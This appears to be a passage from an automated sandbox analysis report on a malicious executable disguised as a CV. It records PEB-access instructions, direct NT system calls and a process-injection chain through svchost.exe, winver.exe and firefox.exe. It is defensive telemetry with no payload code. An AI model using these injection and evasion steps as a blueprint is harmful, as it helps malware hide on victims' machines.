                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AF61C3 mov eax, dword ptr fs:[00000030h]1_2_03AF61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AF61C3 mov eax, dword ptr fs:[00000030h]1_2_03AF61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AAE1D0 mov eax, dword ptr fs:[00000030h]1_2_03AAE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AAE1D0 mov eax, dword ptr fs:[00000030h]1_2_03AAE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AAE1D0 mov ecx, dword ptr fs:[00000030h]1_2_03AAE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AAE1D0 mov eax, dword ptr fs:[00000030h]1_2_03AAE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AAE1D0 mov eax, dword ptr fs:[00000030h]1_2_03AAE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A60124 mov eax, dword ptr fs:[00000030h]1_2_03A60124
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03ADE10E mov eax, dword ptr fs:[00000030h]1_2_03ADE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03ADE10E mov ecx, dword ptr fs:[00000030h]1_2_03ADE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03ADE10E mov eax, dword ptr fs:[00000030h]1_2_03ADE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03ADE10E mov eax, dword ptr fs:[00000030h]1_2_03ADE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03ADE10E mov ecx, dword ptr fs:[00000030h]1_2_03ADE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03ADE10E mov eax, dword ptr fs:[00000030h]1_2_03ADE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03ADE10E mov eax, dword ptr fs:[00000030h]1_2_03ADE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03ADE10E mov ecx, dword ptr fs:[00000030h]1_2_03ADE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03ADE10E mov eax, dword ptr fs:[00000030h]1_2_03ADE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03ADE10E mov ecx, dword ptr fs:[00000030h]1_2_03ADE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03ADA118 mov ecx, dword ptr fs:[00000030h]1_2_03ADA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03ADA118 mov eax, dword ptr fs:[00000030h]1_2_03ADA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03ADA118 mov eax, dword ptr fs:[00000030h]1_2_03ADA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03ADA118 mov eax, dword ptr fs:[00000030h]1_2_03ADA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AF0115 mov eax, dword ptr fs:[00000030h]1_2_03AF0115
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B04164 mov eax, dword ptr fs:[00000030h]1_2_03B04164
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B04164 mov eax, dword ptr fs:[00000030h]1_2_03B04164
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AC4144 mov eax, dword ptr fs:[00000030h]1_2_03AC4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AC4144 mov eax, dword ptr fs:[00000030h]1_2_03AC4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AC4144 mov ecx, dword ptr fs:[00000030h]1_2_03AC4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AC4144 mov eax, dword ptr fs:[00000030h]1_2_03AC4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AC4144 mov eax, dword ptr fs:[00000030h]1_2_03AC4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A2C156 mov eax, dword ptr fs:[00000030h]1_2_03A2C156
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AC8158 mov eax, dword ptr fs:[00000030h]1_2_03AC8158
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A36154 mov eax, dword ptr fs:[00000030h]1_2_03A36154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A36154 mov eax, dword ptr fs:[00000030h]1_2_03A36154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A280A0 mov eax, dword ptr fs:[00000030h]1_2_03A280A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AC80A8 mov eax, dword ptr fs:[00000030h]1_2_03AC80A8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AF60B8 mov eax, dword ptr fs:[00000030h]1_2_03AF60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AF60B8 mov ecx, dword ptr fs:[00000030h]1_2_03AF60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A3208A mov eax, dword ptr fs:[00000030h]1_2_03A3208A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A2A0E3 mov ecx, dword ptr fs:[00000030h]1_2_03A2A0E3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A380E9 mov eax, dword ptr fs:[00000030h]1_2_03A380E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AB60E0 mov eax, dword ptr fs:[00000030h]1_2_03AB60E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A2C0F0 mov eax, dword ptr fs:[00000030h]1_2_03A2C0F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A720F0 mov ecx, dword ptr fs:[00000030h]1_2_03A720F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AB20DE mov eax, dword ptr fs:[00000030h]1_2_03AB20DE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A2A020 mov eax, dword ptr fs:[00000030h]1_2_03A2A020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A2C020 mov eax, dword ptr fs:[00000030h]1_2_03A2C020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AC6030 mov eax, dword ptr fs:[00000030h]1_2_03AC6030
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AB4000 mov ecx, dword ptr fs:[00000030h]1_2_03AB4000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AD2000 mov eax, dword ptr fs:[00000030h]1_2_03AD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AD2000 mov eax, dword ptr fs:[00000030h]1_2_03AD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AD2000 mov eax, dword ptr fs:[00000030h]1_2_03AD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AD2000 mov eax, dword ptr fs:[00000030h]1_2_03AD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AD2000 mov eax, dword ptr fs:[00000030h]1_2_03AD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AD2000 mov eax, dword ptr fs:[00000030h]1_2_03AD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AD2000 mov eax, dword ptr fs:[00000030h]1_2_03AD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AD2000 mov eax, dword ptr fs:[00000030h]1_2_03AD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A4E016 mov eax, dword ptr fs:[00000030h]1_2_03A4E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A4E016 mov eax, dword ptr fs:[00000030h]1_2_03A4E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A4E016 mov eax, dword ptr fs:[00000030h]1_2_03A4E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A4E016 mov eax, dword ptr fs:[00000030h]1_2_03A4E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A5C073 mov eax, dword ptr fs:[00000030h]1_2_03A5C073
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A32050 mov eax, dword ptr fs:[00000030h]1_2_03A32050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AB6050 mov eax, dword ptr fs:[00000030h]1_2_03AB6050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A307AF mov eax, dword ptr fs:[00000030h]1_2_03A307AF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AE47A0 mov eax, dword ptr fs:[00000030h]1_2_03AE47A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AD678E mov eax, dword ptr fs:[00000030h]1_2_03AD678E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A527ED mov eax, dword ptr fs:[00000030h]1_2_03A527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A527ED mov eax, dword ptr fs:[00000030h]1_2_03A527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A527ED mov eax, dword ptr fs:[00000030h]1_2_03A527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03ABE7E1 mov eax, dword ptr fs:[00000030h]1_2_03ABE7E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A347FB mov eax, dword ptr fs:[00000030h]1_2_03A347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A347FB mov eax, dword ptr fs:[00000030h]1_2_03A347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A3C7C0 mov eax, dword ptr fs:[00000030h]1_2_03A3C7C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AB07C3 mov eax, dword ptr fs:[00000030h]1_2_03AB07C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A6C720 mov eax, dword ptr fs:[00000030h]1_2_03A6C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A6C720 mov eax, dword ptr fs:[00000030h]1_2_03A6C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A6273C mov eax, dword ptr fs:[00000030h]1_2_03A6273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A6273C mov ecx, dword ptr fs:[00000030h]1_2_03A6273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A6273C mov eax, dword ptr fs:[00000030h]1_2_03A6273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AAC730 mov eax, dword ptr fs:[00000030h]1_2_03AAC730
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A6C700 mov eax, dword ptr fs:[00000030h]1_2_03A6C700
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A30710 mov eax, dword ptr fs:[00000030h]1_2_03A30710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A60710 mov eax, dword ptr fs:[00000030h]1_2_03A60710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A38770 mov eax, dword ptr fs:[00000030h]1_2_03A38770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A40770 mov eax, dword ptr fs:[00000030h]1_2_03A40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A40770 mov eax, dword ptr fs:[00000030h]1_2_03A40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A40770 mov eax, dword ptr fs:[00000030h]1_2_03A40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A40770 mov eax, dword ptr fs:[00000030h]1_2_03A40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A40770 mov eax, dword ptr fs:[00000030h]1_2_03A40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A40770 mov eax, dword ptr fs:[00000030h]1_2_03A40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A40770 mov eax, dword ptr fs:[00000030h]1_2_03A40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A40770 mov eax, dword ptr fs:[00000030h]1_2_03A40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A40770 mov eax, dword ptr fs:[00000030h]1_2_03A40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A40770 mov eax, dword ptr fs:[00000030h]1_2_03A40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A40770 mov eax, dword ptr fs:[00000030h]1_2_03A40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A40770 mov eax, dword ptr fs:[00000030h]1_2_03A40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A6674D mov esi, dword ptr fs:[00000030h]1_2_03A6674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A6674D mov eax, dword ptr fs:[00000030h]1_2_03A6674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A6674D mov eax, dword ptr fs:[00000030h]1_2_03A6674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A30750 mov eax, dword ptr fs:[00000030h]1_2_03A30750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03ABE75D mov eax, dword ptr fs:[00000030h]1_2_03ABE75D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A72750 mov eax, dword ptr fs:[00000030h]1_2_03A72750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A72750 mov eax, dword ptr fs:[00000030h]1_2_03A72750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AB4755 mov eax, dword ptr fs:[00000030h]1_2_03AB4755
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A6C6A6 mov eax, dword ptr fs:[00000030h]1_2_03A6C6A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A666B0 mov eax, dword ptr fs:[00000030h]1_2_03A666B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A34690 mov eax, dword ptr fs:[00000030h]1_2_03A34690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A34690 mov eax, dword ptr fs:[00000030h]1_2_03A34690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AAE6F2 mov eax, dword ptr fs:[00000030h]1_2_03AAE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AAE6F2 mov eax, dword ptr fs:[00000030h]1_2_03AAE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AAE6F2 mov eax, dword ptr fs:[00000030h]1_2_03AAE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AAE6F2 mov eax, dword ptr fs:[00000030h]1_2_03AAE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AB06F1 mov eax, dword ptr fs:[00000030h]1_2_03AB06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AB06F1 mov eax, dword ptr fs:[00000030h]1_2_03AB06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A6A6C7 mov ebx, dword ptr fs:[00000030h]1_2_03A6A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A6A6C7 mov eax, dword ptr fs:[00000030h]1_2_03A6A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A4E627 mov eax, dword ptr fs:[00000030h]1_2_03A4E627
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A66620 mov eax, dword ptr fs:[00000030h]1_2_03A66620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A68620 mov eax, dword ptr fs:[00000030h]1_2_03A68620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A3262C mov eax, dword ptr fs:[00000030h]1_2_03A3262C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AAE609 mov eax, dword ptr fs:[00000030h]1_2_03AAE609
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A4260B mov eax, dword ptr fs:[00000030h]1_2_03A4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A4260B mov eax, dword ptr fs:[00000030h]1_2_03A4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A4260B mov eax, dword ptr fs:[00000030h]1_2_03A4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A4260B mov eax, dword ptr fs:[00000030h]1_2_03A4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A4260B mov eax, dword ptr fs:[00000030h]1_2_03A4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A4260B mov eax, dword ptr fs:[00000030h]1_2_03A4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A4260B mov eax, dword ptr fs:[00000030h]1_2_03A4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A72619 mov eax, dword ptr fs:[00000030h]1_2_03A72619
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AF866E mov eax, dword ptr fs:[00000030h]1_2_03AF866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AF866E mov eax, dword ptr fs:[00000030h]1_2_03AF866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A6A660 mov eax, dword ptr fs:[00000030h]1_2_03A6A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A6A660 mov eax, dword ptr fs:[00000030h]1_2_03A6A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A62674 mov eax, dword ptr fs:[00000030h]1_2_03A62674
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A4C640 mov eax, dword ptr fs:[00000030h]1_2_03A4C640
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AB05A7 mov eax, dword ptr fs:[00000030h]1_2_03AB05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AB05A7 mov eax, dword ptr fs:[00000030h]1_2_03AB05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AB05A7 mov eax, dword ptr fs:[00000030h]1_2_03AB05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A545B1 mov eax, dword ptr fs:[00000030h]1_2_03A545B1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A545B1 mov eax, dword ptr fs:[00000030h]1_2_03A545B1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A32582 mov eax, dword ptr fs:[00000030h]1_2_03A32582
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A32582 mov ecx, dword ptr fs:[00000030h]1_2_03A32582
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A64588 mov eax, dword ptr fs:[00000030h]1_2_03A64588
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A6E59C mov eax, dword ptr fs:[00000030h]1_2_03A6E59C
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exe Code function: 0_2_003BA66C GetSecurityDescriptorDacl, _memset, GetAclInformation, GetLengthSid, GetAce, AddAce, GetLengthSid, GetProcessHeap, HeapAlloc, GetLengthSid, CopySid, AddAce, SetSecurityDescriptorDacl, SetUserObjectSecurity
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exe Code function: 0_2_003A81AC SetUnhandledExceptionFilter, UnhandledExceptionFilter
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exe Code function: 0_2_003A8189 SetUnhandledExceptionFilter

                HIPS / PFW / Operating System Protection Evasion

                Source: C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exe NtWriteVirtualMemory: Direct from: 0x76F0490C
                Source: C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exe NtAllocateVirtualMemory: Direct from: 0x76F03C9C
                Source: C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exe NtClose: Direct from: 0x76F02B6C
                Source: C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exe NtReadVirtualMemory: Direct from: 0x76F02E8C
                Source: C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exe NtCreateKey: Direct from: 0x76F02C6C
                Source: C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exe NtSetInformationThread: Direct from: 0x76F02B4C
                Source: C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exe NtQueryAttributesFile: Direct from: 0x76F02E6C
                Source: C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exe NtAllocateVirtualMemory: Direct from: 0x76F048EC
                Source: C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exe NtQuerySystemInformation: Direct from: 0x76F048CC
                Source: C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exe NtQueryVolumeInformationFile: Direct from: 0x76F02F2C
                Source: C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exe NtOpenSection: Direct from: 0x76F02E0C
                Source: C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exe NtSetInformationThread: Direct from: 0x76EF63F9
                Source: C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exe NtDeviceIoControlFile: Direct from: 0x76F02AEC
                Source: C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exe NtAllocateVirtualMemory: Direct from: 0x76F02BEC
                Source: C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exe NtCreateFile: Direct from: 0x76F02FEC
                Source: C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exe NtOpenFile: Direct from: 0x76F02DCC
                Source: C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exe NtQueryInformationToken: Direct from: 0x76F02CAC
                Source: C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exe NtTerminateThread: Direct from: 0x76F02FCC
                Source: C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exe NtOpenKeyEx: Direct from: 0x76F02B9C
                Source: C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exe NtProtectVirtualMemory: Direct from: 0x76F02F9C
                Source: C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exe NtSetInformationProcess: Direct from: 0x76F02C5C
                Source: C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exe NtNotifyChangeKey: Direct from: 0x76F03C2C
                Source: C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exe NtCreateMutant: Direct from: 0x76F035CC
                Source: C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exe NtWriteVirtualMemory: Direct from: 0x76F02E3C
                Source: C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exe NtMapViewOfSection: Direct from: 0x76F02D1C
                Source: C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exe NtResumeThread: Direct from: 0x76F036AC
                Source: C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exe NtAllocateVirtualMemory: Direct from: 0x76F02BFC
                Source: C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exe NtReadFile: Direct from: 0x76F02ADC
                Source: C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exe NtQuerySystemInformation: Direct from: 0x76F02DFC
                Source: C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exe NtDelayExecution: Direct from: 0x76F02DDC
                Source: C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exe NtQueryInformationProcess: Direct from: 0x76F02C26
                Source: C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exe NtResumeThread: Direct from: 0x76F02FBC
                Source: C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exe NtCreateUserProcess: Direct from: 0x76F0371C
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\winver.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeSection loaded: NULL target: C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeSection loaded: NULL target: C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeThread register set: target process: 8032Jump to behavior
                Source: C:\Windows\SysWOW64\winver.exeThread APC queued: target process: C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exeJump to behavior
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 2FF9008Jump to behavior
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_003BB106 LogonUserW,0_2_003BB106
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_00383D19 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00383D19
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_003C411C SendInput,keybd_event,0_2_003C411C
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_003C74BB mouse_event,0_2_003C74BB
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exe"Jump to behavior
                Source: C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exeProcess created: C:\Windows\SysWOW64\winver.exe "C:\Windows\SysWOW64\winver.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\winver.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
